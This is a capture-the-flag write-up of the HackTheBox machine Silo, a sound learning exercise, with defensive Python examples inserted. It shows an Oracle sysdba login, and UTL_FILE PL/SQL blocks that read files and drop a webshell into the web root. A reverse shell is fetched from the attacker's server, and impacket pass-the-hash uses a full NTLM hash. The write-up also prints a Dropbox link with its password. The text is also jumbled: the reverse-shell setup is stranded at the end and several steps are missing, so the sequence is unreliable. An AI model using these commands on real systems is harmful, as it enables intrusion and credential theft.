I really like this machine because it gave me my first chance to play with an Oracle TNS database and to learn and use some new tools along the way. To start off, I will use the database to upload a webshell to the web server, which will get me a PowerShell shell. For privilege escalation (privesc), something I had not seen in an HTB box before, I will pull a hash out of a memory dump file and use it with pass-the-hash to get a shell as Administrator. There is also an unintended way to get the root flag before even getting a foothold; I will cover it in Beyond Root.
Enumeration
As always, I begin with the enumeration of ports using nmap:
➜ nmap -p- 10.10.10.82 --min-rate 5000 -oA nmap/silo -v
Scanning 10.10.10.82 [65535 ports]
Discovered open port 80/tcp on 10.10.10.82
Discovered open port 139/tcp on 10.10.10.82
Discovered open port 8080/tcp on 10.10.10.82
Discovered open port 445/tcp on 10.10.10.82
Discovered open port 135/tcp on 10.10.10.82
Discovered open port 49152/tcp on 10.10.10.82
Discovered open port 49155/tcp on 10.10.10.82
Discovered open port 49162/tcp on 10.10.10.82
Discovered open port 49153/tcp on 10.10.10.82
Discovered open port 49160/tcp on 10.10.10.82
Discovered open port 49161/tcp on 10.10.10.82
Discovered open port 47001/tcp on 10.10.10.82
Discovered open port 5985/tcp on 10.10.10.82
Discovered open port 49154/tcp on 10.10.10.82
Discovered open port 1521/tcp on 10.10.10.82
Discovered open port 49159/tcp on 10.10.10.82
Completed Connect Scan at 06:42, 12.07s elapsed (65535 total ports)
Nmap scan report for 10.10.10.82
Host is up (0.029s latency).
Not shown: 65519 closed tcp ports (conn-refused)
PORT STATE SERVICE
80/tcp open http
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1521/tcp open oracle
5985/tcp open wsman
8080/tcp open http-proxy
47001/tcp open winrm
49152/tcp open unknown
49153/tcp open unknown
49154/tcp open unknown
49155/tcp open unknown
49159/tcp open unknown
49160/tcp open unknown
49161/tcp open unknown
49162/tcp open unknown
➜ nmap -sCV 10.10.10.82 -oA nmap/silo_scripts -v
PORT STATE SERVICE VERSION
80/tcp open http Microsoft IIS httpd 8.5
|_http-server-header: Microsoft-IIS/8.5
|_http-title: IIS Windows Server
| http-methods:
| Supported Methods: OPTIONS TRACE GET HEAD POST
|_ Potentially risky methods: TRACE
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
1521/tcp open oracle-tns Oracle TNS listener 11.2.0.2.0 (unauthorized)
8080/tcp open http Oracle XML DB Enterprise Edition httpd
| http-methods:
|_ Supported Methods: GET HEAD POST OPTIONS
| http-auth:
| HTTP/1.1 401 Unauthorized\x0D
|_ Basic realm=XDB
|_http-title: 401 Unauthorized
|_http-server-header: Oracle XML DB/Oracle Database
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49159/tcp open oracle-tns Oracle TNS listener (requires service name)
49160/tcp open msrpc Microsoft Windows RPC
49161/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: supported
| smb2-time:
| date: 2023-12-31T11:48:09
|_ start_date: 2023-12-31T11:18:37
| smb2-security-mode:
| 3:0:2:
|_ Message signing enabled but not required
I like to clear out the small attack surfaces first, so that when I turn to a wide one I have more time and flexibility; web apps, for example, have a much larger attack surface than most other services. So I will start with RPC:
➜ rpcclient -U '' -N 10.10.10.82
Cannot connect to server. Error was NT_STATUS_ACCESS_DENIED
The same goes for the SMB server. I will keep in mind that if I find any credentials, I can retest both services.
I went straight for the web app on port 80, where I found nothing useful except the default page of an IIS server (version 8.5). I will fuzz for directories to see if there is anything else:
➜ gobuster dir -u http://10.10.10.82 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --no-error
I didn't find anything, so I will move on to the next web app on port 8080. This one prompts for a login before showing any page at all. I tried some default credentials without success, so I'm leaving it aside until I find some creds; maybe then I can log in.
First, I will enumerate the SID using a tool called odat.
➜ odat python3 odat.py sidguesser -s 10.10.10.82 -p 1521
[1] (10.10.10.82:1521): Searching valid SIDs
[1.1] Searching valid SIDs thanks to a well known SID list on the 10.10.10.82:1521 server
[+] 'XE' is a valid SID. Continue... # | ETA: 00:00:00
100% |#######################################| Time: 00:00:51
XE is a valid SID.
The SID (Service Identifier) is essentially the database name. Depending on the install, you may have one or more default SIDs, or even a totally custom, DBA-defined SID.
Now I will try to get some valid credentials using the passwordguesser argument of odat.
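From the defender's side, the SID guessing above leaves a clear trail in the Oracle listener log: a burst of connection records from one source host, each naming a different SID and each refused with status 12505 until one succeeds. The Python below is an added example (mine, not part of this writeup or of odat). The sample log lines are constructed; their layout follows the listener.log record convention I know (timestamp, CONNECT_DATA, ADDRESS, establish, SID, status), and the alert threshold is my own choice.

```python
import re
from collections import defaultdict

# Constructed sample listener.log lines (assumption: mirrors the listener's
# "timestamp * CONNECT_DATA * ADDRESS * establish * SID * status" record layout).
# Status 0 is an accepted connection; 12505 is the refusal returned for an unknown
# SID, and the TNS-12505 message line that follows carries no fields of its own.
# 10.10.14.14 plays the scanning host, 10.10.10.50 a normal application client.
SAMPLE_LISTENER_LOG = """\
31-DEC-2023 08:30:01 * (CONNECT_DATA=(SID=ORCL)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.14)(PORT=51001)) * establish * ORCL * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
31-DEC-2023 08:30:01 * (CONNECT_DATA=(SID=PROD)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.14)(PORT=51002)) * establish * PROD * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
31-DEC-2023 08:30:02 * (CONNECT_DATA=(SID=TEST)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.14)(PORT=51003)) * establish * TEST * 12505
TNS-12505: TNS:listener does not currently know of SID given in connect descriptor
31-DEC-2023 08:30:03 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=)(HOST=__jdbc__)(USER=))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.14.14)(PORT=51004)) * establish * XE * 0
31-DEC-2023 08:31:10 * (CONNECT_DATA=(SID=XE)(CID=(PROGRAM=sqlplus)(HOST=app01)(USER=svc_report))) * (ADDRESS=(PROTOCOL=tcp)(HOST=10.10.10.50)(PORT=40021)) * establish * XE * 0
"""

# One connection record per line; the source host is the HOST inside ADDRESS,
# not the HOST inside CONNECT_DATA (which the client fills in itself).
LINE_RE = re.compile(
    r"^(?P<ts>\d{2}-[A-Z]{3}-\d{4} \d{2}:\d{2}:\d{2}) \* "
    r"\(CONNECT_DATA=.*?\) \* "
    r"\(ADDRESS=\(PROTOCOL=\w+\)\(HOST=(?P<host>[^)]+)\)\(PORT=\d+\)\) \* "
    r"establish \* (?P<sid>\S+) \* (?P<status>\d+)$"
)

SID_UNKNOWN = 12505


def parse_listener_log(text):
    """Return one dict per connection record; TNS-12505 message lines and blanks are skipped."""
    records = []
    for line in text.splitlines():
        m = LINE_RE.match(line)
        if m:
            rec = m.groupdict()
            rec["status"] = int(rec["status"])
            records.append(rec)
    return records


def find_sid_guessing(records, min_refusals=3):
    """Flag source hosts that collected at least min_refusals unknown-SID refusals.
    The report lists the SIDs tried in order and whether a later connection from the
    same host was accepted, i.e. whether the guessing found a valid SID."""
    by_host = defaultdict(lambda: {"sids": [], "refusals": 0, "success_after_refusal": False})
    for rec in records:
        info = by_host[rec["host"]]
        if rec["sid"] not in info["sids"]:
            info["sids"].append(rec["sid"])
        if rec["status"] == SID_UNKNOWN:
            info["refusals"] += 1
        elif rec["status"] == 0 and info["refusals"] > 0:
            info["success_after_refusal"] = True
    return {host: info for host, info in by_host.items() if info["refusals"] >= min_refusals}


if __name__ == "__main__":
    for host, info in find_sid_guessing(parse_listener_log(SAMPLE_LISTENER_LOG)).items():
        print(f"{host}: {info['refusals']} refusals, SIDs tried {info['sids']}, "
              f"valid SID found: {info['success_after_refusal']}")
```

Three refusals from one host within seconds is already well outside normal client behaviour; a real deployment would read the live listener.log and window the counts by time, but the grouping logic stays the same.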
Since I have valid credentials, I will try to connect to the DB. I will be using sqlplus to connect to the DB, but first, I need to set it up. Following 0xdf's steps, I will need to download:
instantclient-basic-linux.x64-12.2.0.1.0.zip
instantclient-sdk-linux.x64-12.2.0.1.0.zip
instantclient-sqlplus-linux.x64-12.2.0.1.0.zip
Unzip them in the same directory, then open your shell's rc file (zsh in my case) and add these lines:
➜ sqlplus scott/tiger@10.10.10.82:1521/XE as sysdba
SQL*Plus: Release 12.2.0.1.0 Production on Sun Dec 31 08:41:15 2023
Copyright (c) 1982, 2016, Oracle. All rights reserved.
Connected to:
Oracle Database 11g Express Edition Release 11.2.0.2.0 - 64bit Production
SQL>
The "as sysdba" let me connect with system permissions, which facilitate reading through the database and making changes to the database configuration itself. I can see my user's permissions through:
SQL> select * from user_role_privs;
I can see that I have DBA-level privileges, so I will write a small PL/SQL block that uses UTL_FILE to read files.
SQL> declare
f utl_file.file_type;
s varchar(200);
begin
f:= utl_file.fopen('/inetpub/wwwroot','iisstart.htm','R');
utl_file.get_line(f,s);
utl_file.fclose(f);
dbms_output.put_line(s);
end;
/
PL/SQL procedure successfully completed.
The block ran successfully, but DBMS_OUTPUT is not displayed until I enable the serveroutput option.
SQL> set serveroutput ON
Then I rerun the block by entering "/":
SQL> /
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
PL/SQL procedure successfully completed.
And now I can read files. Next I will try to write a file into the root directory of the web app.
SQL> declare
f utl_file.file_type;
s varchar(5000) := 'ichyaboy was here';
begin
f:= utl_file.fopen('/inetpub/wwwroot','test.htm','W');
utl_file.put_line(f,s);
utl_file.fclose(f);
end;
/
PL/SQL procedure successfully completed.
➜ curl http://10.10.10.82/test.htm
ichyaboy was here
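Anything that can call UTL_FILE with a path under the web root can drop files there, and the file system, not the HTTP log, is where that shows up first. As an added example (mine, not from the post), here is a minimal integrity check in Python that baselines a web root by SHA-256, reports files that appear or change, and raises an alert for server-side script extensions. The demo stands a temporary directory with a constructed default page in for C:\inetpub\wwwroot; the extension list is an assumption about which handlers the site has enabled.

```python
import hashlib
import os
import tempfile

# Extensions the web server would execute rather than serve as-is. A new file with
# one of these in a static web root deserves an alert on its own (assumption: the
# list matches the handlers enabled on the IIS site).
SCRIPT_EXTENSIONS = {".aspx", ".asp", ".ashx", ".asmx", ".php", ".jsp"}


def snapshot(root):
    """Map each file under root (path relative to root) to its SHA-256 digest."""
    digests = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            full = os.path.join(dirpath, name)
            with open(full, "rb") as fh:
                digests[os.path.relpath(full, root)] = hashlib.sha256(fh.read()).hexdigest()
    return digests


def diff_snapshots(baseline, current):
    """Files that appeared, disappeared, or changed content since the baseline."""
    common = baseline.keys() & current.keys()
    return {
        "added": sorted(current.keys() - baseline.keys()),
        "removed": sorted(baseline.keys() - current.keys()),
        "changed": sorted(p for p in common if baseline[p] != current[p]),
    }


def suspicious_additions(diff):
    """Added or changed files with an executable extension: the webshell case."""
    return [p for p in diff["added"] + diff["changed"]
            if os.path.splitext(p)[1].lower() in SCRIPT_EXTENSIONS]


def run_demo():
    """Stand-in for C:\\inetpub\\wwwroot: a temp dir with a constructed default page,
    baselined, then two files dropped the way the UTL_FILE write above did."""
    with tempfile.TemporaryDirectory() as root:
        with open(os.path.join(root, "iisstart.htm"), "w", encoding="utf-8") as fh:
            fh.write("<html>default IIS page (constructed)</html>")
        baseline = snapshot(root)
        with open(os.path.join(root, "test.htm"), "w", encoding="utf-8") as fh:
            fh.write("ichyaboy was here")
        with open(os.path.join(root, "cmd.aspx"), "w", encoding="utf-8") as fh:
            fh.write("<!-- placeholder standing in for a dropped script -->")
        diff = diff_snapshots(baseline, snapshot(root))
        return diff, suspicious_additions(diff)


if __name__ == "__main__":
    changes, alerts = run_demo()
    print("changes:", changes)
    print("alerts:", alerts)
```

Run against the real web root, `snapshot()` should be taken once at deployment and stored off-box, so that a database account with UTL_FILE access cannot quietly rewrite the baseline along with the files.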
Now for a webshell. I will use the cmd.aspx webshell from /usr/share/seclists/Web-Shells/FuzzDB/cmd.aspx, stripped of the styling and other unnecessary lines, so it looks like this:
➜ www python3 -m http.server 80
Serving HTTP on 0.0.0.0 port 80 (http://0.0.0.0:80/) ...
10.10.10.82 - - [31/Dec/2023 09:09:09] "GET /shell.ps1 HTTP/1.1" 200 -
➜ ~ nc -lvnp 9001
listening on [any] 9001 ...
connect to [10.10.14.14] from (UNKNOWN) [10.10.10.82] 49197
Windows PowerShell running as user SILO$ on SILO
Copyright (C) 2015 Microsoft Corporation. All rights reserved.
PS C:\windows\system32\inetsrv>
PS C:\users\Phineas\Desktop> type user.txt
a48e****************************
Privesc
Next to user.txt on Phineas's Desktop there is a file called Oracle issue.txt.
PS C:\users\Phineas\Desktop> cat "Oracle issue.txt"
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
?%Hm8646uC$
I had trouble using the password because I didn't know that the first character was actually wrong due to an encoding issue. So, I will transfer the whole text as base64 to my host machine, then decode it to see what the actual password is.
➜ cat Oracle\ issue.txt
Support vendor engaged to troubleshoot Windows / Oracle performance issue (full memory dump requested):
Dropbox link provided to vendor (and password under separate cover).
Dropbox link
https://www.dropbox.com/sh/69skryzfszb7elq/AADZnQEbbqDoIf5L2d0PBxENa?dl=0
link password:
ÂŖ%Hm8646uC$
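The mangled first character is a classic encoding problem: the pound sign is two bytes in UTF-8, a console that cannot render it prints a "?", and a terminal that decodes those bytes under a single-byte code page prints two characters instead of one. The Python below is an added example (mine, not from the post) that reproduces both failure modes on a constructed secret, reverses the mojibake by re-encoding under candidate code pages until valid UTF-8 comes out, and shows why the base64 transfer the post uses sidesteps the problem. Which code page produced the exact output above is not stated on the page; that the two-character form matches a Latin-4 style decode is my assumption.

```python
import base64

# Constructed sample secret (not the box's password): a pound sign in front of ASCII,
# the same shape as the value that caused trouble above.
SAMPLE_SECRET = "£Example42"


def render_lossy(text, console_codec="ascii"):
    """What a console that cannot represent a character prints for it: a '?' stand-in.
    Assumption: this is what turned the leading character into '?' in the PowerShell output."""
    return text.encode(console_codec, errors="replace").decode(console_codec)


def mojibake(text, wrong_codec):
    """UTF-8 bytes read back under a single-byte codec: every byte becomes its own
    character, so the two-byte pound sign turns into two characters."""
    return text.encode("utf-8").decode(wrong_codec)


def unmojibake(text, candidates=("latin-1", "iso8859_4", "cp1252")):
    """Reverse the damage without the original bytes: re-encode under each candidate
    codec and keep the first result that is valid UTF-8. Returns (codec, text) or None."""
    for codec in candidates:
        try:
            return codec, text.encode(codec).decode("utf-8")
        except (UnicodeEncodeError, UnicodeDecodeError):
            continue
    return None


def to_base64_utf8(text):
    """The transfer the post uses: base64 is pure ASCII, so the raw UTF-8 bytes survive
    any console or clipboard unchanged."""
    return base64.b64encode(text.encode("utf-8")).decode("ascii")


def recover_from_base64(b64):
    """Decode base64, then decode the bytes as UTF-8 (assumption: the file was UTF-8)."""
    return base64.b64decode(b64).decode("utf-8")


if __name__ == "__main__":
    print("lossy console :", render_lossy(SAMPLE_SECRET))
    print("latin-1 view  :", mojibake(SAMPLE_SECRET, "latin-1"))
    print("latin-4 view  :", mojibake(SAMPLE_SECRET, "iso8859_4"))
    print("repaired      :", unmojibake(mojibake(SAMPLE_SECRET, "iso8859_4")))
    b64 = to_base64_utf8(SAMPLE_SECRET)
    print("base64 transfer:", b64, "->", recover_from_base64(b64))
```

On the Windows side, one way to produce the base64 is `[Convert]::ToBase64String([IO.File]::ReadAllBytes('C:\Users\Phineas\Desktop\Oracle issue.txt'))`, then `base64 -d` on the Linux host. If the file had been saved as UTF-16 by a Windows editor, the decoded bytes would start with FF FE and `recover_from_base64` would need `utf-16` instead of `utf-8`; checking the first bytes before decoding is the safe habit.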
After unzipping the file:
➜ file SILO-20180105-221806.dmp
SILO-20180105-221806.dmp: MS Windows 64bit crash dump, version 15.9600, 2 processors, DumpType (0x1), 261996 pages
It's a memory dump file, so I will use Volatility to analyze it, but first I need a profile.
Now I will use psexec from impacket to get a shell as Administrator:
➜ impacket-psexec -hashes aad3b435b51404eeaad3b435b51404ee:9e730375b7cbcebf74ae46481e07b0c7 administrator@10.10.10.82
C:\Windows\system32> whoami
nt authority\system
C:\Users\Administrator\Desktop> type root.txt
fb6b****************************
Beyond Root
Here I will show how root.txt can be read straight from the Oracle DB: I just reuse the file-reading block from earlier and point it at the root.txt path.
SQL> declare
f utl_file.file_type;
s varchar(200);
begin
f:= utl_file.fopen('/Users/Administrator/Desktop','root.txt','R');
utl_file.get_line(f,s);
utl_file.fclose(f);
dbms_output.put_line(s);
end;
/
fb6b****************************
PL/SQL procedure successfully completed.
Now I went for the Oracle TNS DB. After reading about this type of database and exploring multiple attack paths, I found this article on Hacktricks () useful.
By accessing , I can run commands easily from the webshell. However, this shell isn't very flexible, so I will go for a reverse shell. I will use /usr/share/nishang/Shells/Invoke-PowerShellTcp.ps1, rename it to shell.ps1, set up a Python HTTP server, and listen on port 9001.